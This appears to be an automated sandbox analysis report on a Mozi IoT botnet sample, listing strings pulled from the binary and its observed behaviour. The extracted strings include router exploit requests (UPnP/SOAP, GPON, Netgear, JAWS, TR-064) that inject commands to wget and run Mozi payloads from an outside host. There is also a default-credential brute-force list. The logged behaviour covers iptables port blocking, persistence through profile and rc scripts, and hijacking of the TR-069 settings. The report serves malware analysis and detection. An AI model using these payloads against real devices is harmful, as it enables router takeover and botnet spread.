Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: KnAY2OIPI3, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4635) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4668) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4671) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4707) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4733) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4754) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4776) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4811) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4814) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4823) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4846) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4894) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4920) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4944) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4957) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4980) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5024) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5053) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5080) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5135) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5149) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5172) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5186) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5227) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5249) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5252) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /proc/4596/mounts Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4596) File: /etc/rc.local Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4600) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 4600) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3512/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/359/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1452/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3632/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3518/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1339/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/19/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/483/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3527/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3527/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3525/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1346/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3524/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3524/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3523/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/5/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/7/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/8/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1363/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3541/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3541/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1362/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/496/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/496/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/31/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/31/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1119/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3790/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3791/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3310/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3431/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3431/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3550/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/260/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/263/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/264/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/385/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/144/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/386/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/145/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/146/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3546/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3546/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/147/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3303/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3545/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/148/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/149/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3543/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/822/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/822/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3308/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3308/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3429/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3429/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/47/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/48/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/48/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/49/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/150/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/271/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/151/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/152/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/153/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/395/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/396/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/154/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/155/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/156/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/1017/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/157/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/158/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/159/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3432/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/3432/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/50/stat Jump to behavior
Source: /usr/bin/killall (PID: 4600) File opened: /proc/51/stat Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/KnAY2OIPI3 (PID: 4598) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4632) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4666) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4669) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4700) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4724) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4748) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4767) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4774) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4809) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4812) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4816) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4836) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4863) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4873) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4885) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4911) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4940) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4946) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4952) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4970) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5019) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5022) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5026) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5045) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5072) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 5100) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
